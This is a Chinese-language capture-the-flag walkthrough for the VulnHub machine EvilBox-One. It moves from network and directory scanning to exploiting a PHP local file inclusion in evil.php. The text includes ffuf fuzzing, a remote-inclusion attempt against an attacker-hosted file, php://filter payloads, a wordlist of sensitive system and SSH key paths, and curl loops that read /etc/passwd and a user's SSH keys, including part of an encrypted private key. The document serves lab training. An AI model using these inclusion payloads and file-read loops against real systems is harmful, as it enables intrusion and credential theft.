靶机: EvilBox---One

准备工作

靶机地址: https://download.vulnhub.com/evilbox/EvilBox---One.ova
- MD5 校验：c3a65197b891713731e6bb791d7ad259
  - cmd 进行校验: certutil -hashfile 文件路径 MD5
  - powershell 进行校验: Get-FileHash 文件路径 -Algorithm MD5 | Format-List
- 使用 VirtualBox
- 网络 Host-Only
配置网络环境：https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]

靶机攻略

发现目标

使用常规工具：

arp-scan
nmap
netdiscover
fping

一个初步发现，使用 sudo arp-scan -l -I eth1 比较其他扫描多多少少有一定限制，nmap 适合锁定目标后进一步扫描

Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116

Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)

192.168.56.100  08:00:27:15:0f:e5       PCS Systemtechnik GmbH

192.168.56.117  08:00:27:4d:bc:dd       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel

Ending arp-scan 1.9.8: 256 hosts scanned in 2.140 seconds (119.63 hosts/sec). 3 responded

192.168.56.1 和 192.168.56.100 分别是网关和 DHCP 服务器地址
目标就是 192.168.56.117

使用一个 nmap 的常规扫描 nmap -A -T4 192.168.56.117

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 09:41 CST

Nmap scan report for 192.168.56.117

Host is up (0.0012s latency).

Not shown: 998 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

| ssh-hostkey:

|   2048 4495500be473a18511ca10ec1ccbd426 (RSA)

|   256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)

|_  256 e30756a92563d4ce3901c19ad9fede64 (ED25519)

80/tcp open  http    Apache httpd 2.4.38 ((Debian))

|_http-server-header: Apache/2.4.38 (Debian)

|_http-title: Apache2 Debian Default Page: It works

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds

确认 22 端口开放服务 OpenSSH/7.9b1
确认 80 端口开放服务 Apache/2.4.38
系统类型是 Linux: Debian
SSH 暂且不考虑
- 没有密码和密钥
- 信息情报全无
决定从 80 的 http 下手，即便不能攻破，也能收集部分信息用于 SSH 爆破

Web 攻击

先使用 firefox 访问 http://192.168.56.117:80/ 进行初步刺探

发现只是一个 Apache2 Debian 的初始页面，基本没有可用信息

使用 Web 嗅探工具爬取此 Web 站点的隐藏页面，推荐以下工具

dirsearch
dirb
dirbuster
gobuster
feroxbuster
ffuf
wfuzz

我们使用 dirsearch --url='192.168.56.117:80/'

┌──(kali㉿kali)-[~]

└─$ dirsearch --url='192.168.56.117:80/'

  _|. _ _  _  _  _ _|_    v0.4.2

 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/80-_22-11-09_09-52-49.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-11-09_09-52-49.log

Target: http://192.168.56.117:80/

[09:52:49] Starting:

[09:52:52] 403 -  279B  - /.ht_wsr.txt

[09:52:52] 403 -  279B  - /.htaccess.bak1

[09:52:52] 403 -  279B  - /.htaccess.sample

[09:52:52] 403 -  279B  - /.htaccess.save

[09:52:52] 403 -  279B  - /.htaccess_extra

[09:52:52] 403 -  279B  - /.htaccess_orig

[09:52:52] 403 -  279B  - /.htaccess_sc

[09:52:52] 403 -  279B  - /.htaccess.orig

[09:52:52] 403 -  279B  - /.htaccessOLD

[09:52:52] 403 -  279B  - /.htaccessOLD2

[09:52:52] 403 -  279B  - /.htpasswds

[09:52:52] 403 -  279B  - /.html

[09:52:52] 403 -  279B  - /.htm

[09:52:52] 403 -  279B  - /.htpasswd_test

[09:52:52] 403 -  279B  - /.httr-oauth

[09:52:52] 403 -  279B  - /.htaccessBAK

[09:52:54] 403 -  279B  - /.php

[09:53:51] 200 -   10KB - /index.html

[09:54:23] 200 -   12B  - /robots.txt

[09:54:25] 200 -    4B  - /secret/

[09:54:25] 301 -  317B  - /secret  ->  http://192.168.56.117/secret/

[09:54:25] 403 -  279B  - /server-status

[09:54:25] 403 -  279B  - /server-status/

/index.html 明显是前面 Apache2 Debian 的初始页面，没有价值
/robots.txt 一般指robots协议，存在些许价值
- robots 协议也称爬虫协议、爬虫规则等，是指网站可建立一个 robots.txt 文件来告诉搜索引擎哪些页面可以抓取，哪些页面不能抓取，而搜索引擎则通过读取 robots.txt 文件来识别这个页面是否允许被抓取
- 但是这个 robots 协议不是防火墙，也没有强制执行力，搜索引擎完全可以忽视 robots.txt 文件去抓取网页的快照
/secret 一个目录，可能需要进一步探索

我们先查看一下 http://192.168.56.117:80/robots.txt 看看有什么

发现一句话：Hello H4x0r
- 科普 H4x0r 是代指 Hacker 表示黑客，是 l33t speak 的一种暗语或黑话，其中 H4x0r 便是 Hacker 的意思
- 这个应该是对入侵者的嘲讽，没有多少价值，也可能密码或账号会与 H4x0r 有关，我们暂且收录
robots.txt 如果是这种近乎空的内容是起到反爬虫的作用

目前还有价值的是 /secret 目录，让我们进行二次 Web 页面探取，使用 dirsearch --url='192.168.56.117:80/secret'

使用 dirsearch 并没有结果，我们可以尝试换一个字典，使用命令 dirsearch --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -e txt,php,html,jsp
- --wordlists= 是指定字典
- seclists 是 kali 的一个字典集，如果没有可以直接在 kali 安装
- -e 是指定搜索范围的文件拓展名
- 爆破速度可能会很慢，如果 kali 分配的内核和内存足够可以不必顾虑，如果 kali 配置性能查可以使用 gobuster 命令 gobuster dir --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp 毕竟 dirsearch 使用 python 速度都知道，而 gobuster 是 go 编写接近于 C 的速度

┌──(kali㉿kali)-[~]

└─$ gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

===============================================================

Gobuster v3.3

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://192.168.56.117:80/secret

[+] Method:                  GET

[+] Threads:                 10

[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.3

[+] Extensions:              txt,php,html,jsp

[+] Timeout:                 10s

===============================================================

2022/11/09 19:35:29 Starting gobuster in directory enumeration mode

===============================================================

/.php                 (Status: 403) [Size: 279]

/.html                (Status: 403) [Size: 279]

/index.html           (Status: 200) [Size: 4]

/evil.php             (Status: 200) [Size: 0]ec

Progress: 708415 / 708545 (99.98%)===============================================================

2022/11/09 19:42:23 Finished

===============================================================

对于 Web 目录爆破使用工具不是重点，重点是字典选取
结果是 /evil.php 我们的新线索

我们尝试访问 /evil.php 发现什么也没有，即使是查看 Web 源码也没有什么，那么我们可以猜测这个页面属于脚本可能是用于处理数据的，如果是这样那一定存在请求参数这样才有数据交互，我们下一步：便是进行参数爆破

此处我们使用 ffuf 进行

参数字典我们使用 kali 经典的 seclists
我们构建的值字典：var.txt
```
0

1

a

'

"

(

[

{

<

,

;

?

`

/

\

%

ture

false

../robots.txt

H4x0r
```
构建思路，可能性的猜测【触发漏洞的值，具有普遍性的内容，确定的文件，收集信息】
- 数字类型：0, 1 表示数值或布尔值，经典试探
- 字母：a 表示一个单字母或字符串或词
- 括号闭合错误：', ", (, [, {, <
- 特殊字符：, ; ? ` / \ %
- 布尔表示：ture, false
- 文件包含类类型：../robots.txt 这是一个我们 已知存在 且 内容不复杂易反馈 的内部文件
- 收集信息：H4x0r
构建 ffuf 的命令 ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0
- -w 是知道字典，在字典组合格式是 字典路径:字典代称
- -u 是指定爆破请求 Web 路径
- -fs 是过滤 HTTP 响应体大小，意思是返回大小为 0 直接筛掉

┌──(kali㉿kali)-[~/workspace]

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0

        /'___\  /'___\           /'___\

       /\ \__/ /\ \__/  __  __  /\ \__/

       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\

        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/

         \ \_\   \ \_\  \ \____/  \ \_\

          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3

________________________________________________

 :: Method           : GET

 :: URL              : http://192.168.56.117/secret/evil.php?params=var

 :: Wordlist         : params: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

 :: Wordlist         : var: ./var.txt

 :: Follow redirects : false

 :: Calibration      : false

 :: Timeout          : 10

 :: Threads          : 40

 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500

 :: Filter           : Response size: 0

________________________________________________

[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 50ms]

    * params: command

    * var: ../robots.txt

:: Progress: [109701/109701] :: Job [1/1] :: 1599 req/sec :: Duration: [0:02:00] :: Errors: 0 ::

结果表明参数是 command
数值是 ../robots.txt 表明 /evil.php 是文件包含作用

我们构建一个请求，对 /evil.php 功能进行进一步测试，构建 http://192.168.56.117/secret/evil.php?command=../robots.txt 用 firefox 访问并查看源码发现返回内容很纯粹，与 /robots.txt 并无区别，大致可以判断其文件包含会直接返回，学习过 PHP 应该知道 PHP 文件包含漏洞，我们可以从这个方面入手

检查包含是否支持远程，如果能直接木马登录

┌──(kali㉿kali)-[~/workspace]

└─$ ls

var.txt

┌──(kali㉿kali)-[~/workspace]

└─$ python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

-- 水平分割 --

┌──(kali㉿kali)-[~]

└─$ curl "http://192.168.56.117/secret/evil.php?command=http://192.168.56.116:80/var.txt"

不支持远程

是否能动用 PHP 内置 URL 风格的封装协议，如果能直接写入木马登录

┌──(kali㉿kali)-[~/workspace]

└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"                   3 ⨯

SGVsbG8gSDR4MHIK

┌──(kali㉿kali)-[~]

└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/write/resource=../robots.txt&txt=1"

Hello H4x0r

┌──(kali㉿kali)-[~]

└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" | base64 --decode   1 ⨯

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current

                                Dload  Upload   Total   Spent    Left  Speed

100    92  100    92    0     0   8532      0 --:--:-- --:--:-- --:--:--  9200

<?php

    $filename = $_GET['command'];

    include($filename);

?>

可以使用 php:// 访问各个 IO 流进行读取
但无法写入数据
通过加密读取，我们可以窥探 evil.php 内容，发现只是一个简单的文件上传

<?php

    $filename = $_GET['command'];

    include($filename);

?>

检查包含能否对系统敏感文件直接窥探，继续收集信息寻求突破

一般查看 /etc/passwd 、 /etc/shadow 、 /etc/sudoers 、 */.ssh/authorized_keys ...

构建字典 file.txt

/apache/apache/conf/httpd.conf

/apache/apache2/conf/httpd.conf

/apache/php/php.ini

/bin/php.ini

/etc/anacrontab

/etc/apache/apache.conf

/etc/apache/httpd.conf

/etc/apache2/apache.conf

/etc/apache2/httpd.conf

/etc/apache2/sites-available/default

/etc/apache2/vhosts.d/00_default_vhost.conf

/etc/at.allow

/etc/at.deny

/etc/cron.allow

/etc/cron.deny

/etc/crontab

/etc/fstab

/etc/host.conf

/etc/httpd/conf.d/httpd.conf

/etc/httpd/conf.d/php.conf

/etc/httpd/conf/httpd.conf

/etc/httpd/htdocs/index.html

/etc/httpd/htdocs/index.php

/etc/httpd/logs/access.log

/etc/httpd/logs/access_log

/etc/httpd/logs/error.log

/etc/httpd/logs/error_log

/etc/httpd/php.ini

/etc/init.d/httpd

/etc/init.d/mysql

/etc/ld.so.conf

/etc/motd

/etc/my.cnf

/etc/mysql/my.cnf

/etc/mysql/my.cnf

/etc/network/interfaces

/etc/networks

/etc/passwd

/etc/php.ini

/etc/php/apache/php.ini

/etc/php/apache2/php.ini

/etc/php/cgi/php.ini

/etc/php/php.ini

/etc/php/php4/php.ini

/etc/php4.4/fcgi/php.ini

/etc/php4/apache/php.ini

/etc/php4/apache2/php.ini

/etc/php4/cgi/php.ini

/etc/php5/apache/php.ini

/etc/php5/apache2/php.ini

/etc/php5/cgi/php.ini

/etc/phpmyadmin/config.inc.php

/etc/resolv.conf

/etc/shadow

/etc/ssh/sshd_config

/etc/ssh/ssh_config

/etc/ssh/ssh_host_dsa_key

/etc/ssh/ssh_host_dsa_key

/etc/ssh/ssh_host_dsa_key.pub

/etc/ssh/ssh_host_dsa_key.pub

/etc/ssh/ssh_host_key

/etc/ssh/ssh_host_key

/etc/ssh/ssh_host_key.pub

/etc/ssh/ssh_host_key.pub

/etc/ssh/ssh_host_rsa_key

/etc/ssh/ssh_host_rsa_key

/etc/ssh/ssh_host_rsa_key.pub

/etc/ssh/ssh_host_rsa_key.pub

/etc/sysconfig/network

/etc/sysconfig/network

/home/apache/conf/httpd.conf

/home/apache2/conf/httpd.conf

/home/bin/stable/apache/php.ini

/home2/bin/stable/apache/php.ini

/NetServer/bin/stable/apache/php.ini

/opt/www/conf/httpd.conf

/opt/www/htdocs/index.html

/opt/www/htdocs/index.php

/opt/xampp/etc/php.ini

/PHP/php.ini

/php/php.ini

/php4/php.ini

/php5/php.ini

/root/.atftp_history

/root/.bashrc

/root/.bash_history

/root/.mysql_history

/root/.nano_history

/root/.php_history

/root/.profile

/root/.ssh/authorized_keys

/root/.ssh/identity

/root/.ssh/identity.pub

/root/.ssh/id_dsa

/root/.ssh/id_dsa.pub

/root/.ssh/id_rsa

/root/.ssh/id_rsa.pub

/root/anaconda-ks.cfg

/tmp/apache/htdocs/index.html

/tmp/apache/htdocs/index.php

/usr/lib/php.ini

/usr/lib/php/php.ini

/usr/local/apache/conf/httpd.conf

/usr/local/apache/conf/php.ini

/usr/local/apache/htdocs/index.html

/usr/local/apache/htdocs/index.php

/usr/local/apache/logs/access.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access_logaccess_log.old

/usr/local/apache/logs/error.log

/usr/local/apache/logs/error_log

/usr/local/apache/logs/error_logerror_log.old

/usr/local/apache2/conf/httpd.conf

/usr/local/apache2/conf/php.ini

/usr/local/apache2/htdocs/index.html

/usr/local/apache2/htdocs/index.php

/usr/local/cpanel/logs

/usr/local/cpanel/logs/access_log

/usr/local/cpanel/logs/error_log

/usr/local/cpanel/logs/license_log

/usr/local/cpanel/logs/login_log

/usr/local/cpanel/logs/stats_log

/usr/local/cpanel/logs/stats_log

/usr/local/etc/php.ini

/usr/local/httpd/conf/httpd.conf

/usr/local/httpd2.2/htdocs/index.html

/usr/local/httpd2.2/htdocs/index.php

/usr/local/lib/php.ini

/usr/local/mysql/bin/mysql

/usr/local/mysql/my.cnf

/usr/local/php/lib/php.ini

/usr/local/php4/lib/php.ini

/usr/local/php4/lib/php.ini

/usr/local/php4/php.ini

/usr/local/php5/etc/php.ini

/usr/local/php5/lib/php.ini

/usr/local/php5/php5.ini

/usr/local/share/examples/php/php.ini

/usr/local/share/examples/php4/php.ini

/usr/local/tomcat5527/bin/version.sh

/usr/local/Zend/etc/php.ini

/usr/share/tomcat6/bin/startup.sh

/usr/tomcat6/bin/startup.sh

/var/apache2/config.inc

/var/httpd/conf/httpd.conf

/var/httpd/conf/php.ini

/var/httpd/conf/php.ini

/var/httpd/htdocs/index.html

/var/httpd/htdocs/index.php

/var/lib/mysql/my.cnf

/var/lib/mysql/mysql/user.MYD

/var/local/www/conf/httpd.conf

/var/local/www/conf/php.ini

/var/log/access.log

/var/log/access_log

/var/log/apache/access.log

/var/log/apache/access_log

/var/log/apache/error.log

/var/log/apache/error_log

/var/log/apache2/access.log

/var/log/apache2/access_log

/var/log/apache2/error.log

/var/log/apache2/error_log

/var/log/error.log

/var/log/error_log

/var/log/mysql.log

/var/log/mysql/mysql-bin.log

/var/log/mysql/mysql-slow.log

/var/log/mysql/mysql.log

/var/log/mysqlderror.log

/var/mail/root

/var/mysql.log

/var/spool/cron/crontabs/root

/var/spool/mail/root

/var/www/conf/httpd.conf

/var/www/htdocs/index.html

/var/www/htdocs/index.php

/var/www/index.html

/var/www/index.php

/var/www/logs/access.log

/var/www/logs/access_log

/var/www/logs/error.log

/var/www/logs/error_log

/web/conf/php.ini

/www/conf/httpd.conf

/www/htdocs/index.html

/www/htdocs/index.php

/www/php/php.ini

/www/php4/php.ini

/www/php5/php.ini

/xampp/apache/bin/php.ini

/xampp/apache/conf/httpd.conf

root/.ssh/authorized_keys

root/.ssh/identity

root/.ssh/identity.pub

root/.ssh/id_dsa

root/.ssh/id_dsa.pub

root/.ssh/id_rsa

root/.ssh/id_rsa.pub

构建的爆破语句 bash 脚本

for i in $(cat ./file.txt)

do

    echo ">>>$i:"

    curl "http://192.168.56.117/secret/evil.php?command=$i"

done

下面结果经过处理，重复或无结果或结果为默认内容是被去除了的

┌──(kali㉿kali)-[~/workspace]

└─$ for i in $(cat ./file.txt)

for> do

for> echo ">>>$i:"

for> curl "http://192.168.56.117/secret/evil.php?command=$i"

for> done

>>>/etc/passwd:

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin

systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin

systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin

messagebus:x:104:110::/nonexistent:/usr/sbin/nologin

sshd:x:105:65534::/run/sshd:/usr/sbin/nologin

mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash

systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

>>>/etc/resolv.conf:

domain home

search home

nameserver 192.168.1.1

>>>/etc/ssh/sshd_config:

#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See

# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with

# OpenSSH is to specify options with their default value where

# possible, but leave them commented.  Uncommented options override the

# default value.

#Port 22

#AddressFamily any

#ListenAddress 0.0.0.0

#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key

#HostKey /etc/ssh/ssh_host_ecdsa_key

#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying

#RekeyLimit default none

# Logging

#SyslogFacility AUTH

#LogLevel INFO

# Authentication:

#LoginGraceTime 2m

#PermitRootLogin prohibit-password

#StrictModes yes

#MaxAuthTries 6

#MaxSessions 10

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.

#AuthorizedKeysFile     .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none

#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts

#HostbasedAuthentication no

# Change to yes if you don't trust ~/.ssh/known_hosts for

# HostbasedAuthentication

#IgnoreUserKnownHosts no

# Don't read the user's ~/.rhosts and ~/.shosts files

#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!

#PasswordAuthentication yes

#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with

# some PAM modules and threads)

ChallengeResponseAuthentication no

# Kerberos options

#KerberosAuthentication no

#KerberosOrLocalPasswd yes

#KerberosTicketCleanup yes

#KerberosGetAFSToken no

# GSSAPI options

#GSSAPIAuthentication no

#GSSAPICleanupCredentials yes

#GSSAPIStrictAcceptorCheck yes

#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,

# and session processing. If this is enabled, PAM authentication will

# be allowed through the ChallengeResponseAuthentication and

# PasswordAuthentication.  Depending on your PAM configuration,

# PAM authentication via ChallengeResponseAuthentication may bypass

# the setting of "PermitRootLogin without-password".

# If you just want the PAM account and session checks to run without

# PAM authentication, then enable this but set PasswordAuthentication

# and ChallengeResponseAuthentication to 'no'.

UsePAM yes

#AllowAgentForwarding yes

#AllowTcpForwarding yes

#GatewayPorts no

X11Forwarding yes

#X11DisplayOffset 10

#X11UseLocalhost yes

#PermitTTY yes

PrintMotd no

PrintLastLog no

#TCPKeepAlive yes

#PermitUserEnvironment no

#Compression delayed

#ClientAliveInterval 0

#ClientAliveCountMax 3

#UseDNS no

#PidFile /var/run/sshd.pid

#MaxStartups 10:30:100

#PermitTunnel no

#ChrootDirectory none

#VersionAddendum none

# no default banner path

#Banner none

# Allow client to pass locale environment variables

AcceptEnv LANG LC_*

# override default of no subsystems

Subsystem       sftp    /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis

#Match User anoncvs

#       X11Forwarding no

#       AllowTcpForwarding no

#       PermitTTY no

#       ForceCommand cvs server

>>>/etc/ssh/ssh_config:

# This is the ssh client system-wide configuration file.  See

# ssh_config(5) for more information.  This file provides defaults for

# users, and the values can be changed in per-user configuration files

# or on the command line.

# Configuration data is parsed as follows:

#  1. command line options

#  2. user-specific file

#  3. system-wide file

# Any configuration value is only changed the first time it is set.

# Thus, host-specific definitions should be at the beginning of the

# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive

# list of available options, their meanings and defaults, please see the

# ssh_config(5) man page.

Host *

#   ForwardAgent no

#   ForwardX11 no

#   ForwardX11Trusted yes

#   PasswordAuthentication yes

#   HostbasedAuthentication no

#   GSSAPIAuthentication no

#   GSSAPIDelegateCredentials no

#   GSSAPIKeyExchange no

#   GSSAPITrustDNS no

#   BatchMode no

#   CheckHostIP yes

#   AddressFamily any

#   ConnectTimeout 0

#   StrictHostKeyChecking ask

#   IdentityFile ~/.ssh/id_rsa

#   IdentityFile ~/.ssh/id_dsa

#   IdentityFile ~/.ssh/id_ecdsa

#   IdentityFile ~/.ssh/id_ed25519

#   Port 22

#   Protocol 2

#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc

#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com

#   EscapeChar ~

#   Tunnel no

#   TunnelDevice any:any

#   PermitLocalCommand no

#   VisualHostKey no

#   ProxyCommand ssh -q -W %h:%p gateway.example.com

#   RekeyLimit 1G 1h

    SendEnv LANG LC_*

    HashKnownHosts yes

    GSSAPIAuthentication yes

>>>/etc/ssh/ssh_host_rsa_key.pub:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne

下面是中奖内容：

/etc/crontab 内容是默认
/etc/fstab 内容是默认
/etc/host.conf 内容是默认
/etc/ld.so.conf 内容是默认
/etc/network/interfaces 内容是默认
/etc/networks 无用
/etc/passwd
/etc/resolv.conf 无用
/etc/ssh/sshd_config 内容是默认
/etc/ssh/ssh_config 内容是默认
/etc/ssh/ssh_host_rsa_key.pub

新的细节发现

/etc/passwd
- 我们知道还存在一个名为 mowree 的用户
/etc/ssh/ssh_host_rsa_key.pub
- ssh 登录线索，并且登录指向 root@EvilBoxOne

信息不足，但我们有新的线索是 mowree 看看它是否存在 .ssh 的登录内容，构建一个简单的 ssh 猜测字典 ssh_dict.txt 比较我们发现 /etc/ssh/ssh_host_rsa_key.pub 的存在

/root/.ssh/authorized_keys

/root/.ssh/identity

/root/.ssh/identity.pub

/root/.ssh/id_dsa

/root/.ssh/id_dsa.pub

/root/.ssh/id_rsa

/root/.ssh/id_rsa.pub

/root/.ssh/ssh_host_dsa_key

/root/.ssh/ssh_host_dsa_key.pub

/root/.ssh/ssh_host_key

/root/.ssh/ssh_host_key.pub

/root/.ssh/ssh_host_rsa_key

/root/.ssh/ssh_host_rsa_key.pub

/home/mowree/.ssh/authorized_keys

/home/mowree/.ssh/identity

/home/mowree/.ssh/identity.pub

/home/mowree/.ssh/id_dsa

/home/mowree/.ssh/id_dsa.pub

/home/mowree/.ssh/id_rsa

/home/mowree/.ssh/id_rsa.pub

/home/mowree/.ssh/ssh_host_dsa_key

/home/mowree/.ssh/ssh_host_dsa_key.pub

/home/mowree/.ssh/ssh_host_key

/home/mowree/.ssh/ssh_host_key.pub

/home/mowree/.ssh/ssh_host_rsa_key

/home/mowree/.ssh/ssh_host_rsa_key.pub

攻击脚本

for i in $(cat ./ssh_dict.txt);

do

echo "输出 >>>$i:";

curl "http://192.168.56.117/secret/evil.php?command=$i";

done

结果

输出 >>>/root/.ssh/authorized_keys:

输出 >>>/root/.ssh/identity:

输出 >>>/root/.ssh/identity.pub:

输出 >>>/root/.ssh/id_dsa:

输出 >>>/root/.ssh/id_dsa.pub:

输出 >>>/root/.ssh/id_rsa:

输出 >>>/root/.ssh/id_rsa.pub:

输出 >>>/root/.ssh/ssh_host_dsa_key:

输出 >>>/root/.ssh/ssh_host_dsa_key.pub:

输出 >>>/root/.ssh/ssh_host_key:

输出 >>>/root/.ssh/ssh_host_key.pub:

输出 >>>/root/.ssh/ssh_host_rsa_key:

输出 >>>/root/.ssh/ssh_host_rsa_key.pub:

输出 >>>/home/mowree/.ssh/authorized_keys:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne

输出 >>>/home/mowree/.ssh/identity:

输出 >>>/home/mowree/.ssh/identity.pub:

输出 >>>/home/mowree/.ssh/id_dsa:

输出 >>>/home/mowree/.ssh/id_dsa.pub:

输出 >>>/home/mowree/.ssh/id_rsa:

-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6

hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe

o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb

+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot

b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k

HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg

9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY

zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu

rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1

tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs

